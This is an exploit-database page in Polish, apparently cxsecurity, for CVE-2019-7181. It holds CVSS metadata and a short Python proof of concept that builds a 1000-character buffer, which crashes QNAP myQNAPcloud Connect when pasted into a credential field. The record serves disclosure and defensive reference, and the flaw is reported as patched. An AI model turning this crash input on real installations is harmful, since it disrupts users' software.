Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
QNAP myQNAPcloud Connect 1.3.4.0317 Username/Password Denial Of Service
2019.04.20
Credit:
Dino Covotsos
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2019-7181
CWE:
CWE-119
Ogólna skala CVSS:
5/10
Znaczenie:
2.9/10
Łatwość wykorzystania:
10/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Niska
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Brak
Wpływ na integralność:
Brak
Wpływ na dostępność:
Częściowy
#!/usr/bin/python # Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS # Date: 19/04/2019 # Exploit Author: Dino Covotsos - Telspace Systems # Vendor Homepage: https://www.qnap.com # Version: 1.3.4.0317 and below are vulnerable # Software Link: https://www.qnap.com/en/utilities/essentials # Contact: services[@]telspace.co.za # Twitter: @telspacesystems (Greets to the Telspace Crew) # Tested on: Windows XP/7/10 (version 1.3.3.0925) # CVE: CVE-2019-7181 # POC # 1.) Generate qnap.txt # 2.) Copy the contents of qnap.txt to the clipboard # 3.) Paste the contents in any username/password field(Add or Edit VPN) # 4.) Click ok, program crashes. # This vulnerability was responsibly disclosed February 3, 2019, new version has been released. buffer = "A" * 1000 payload = buffer try: f=open("qnap.txt","w") print "[+] Creating %s bytes QNAP payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top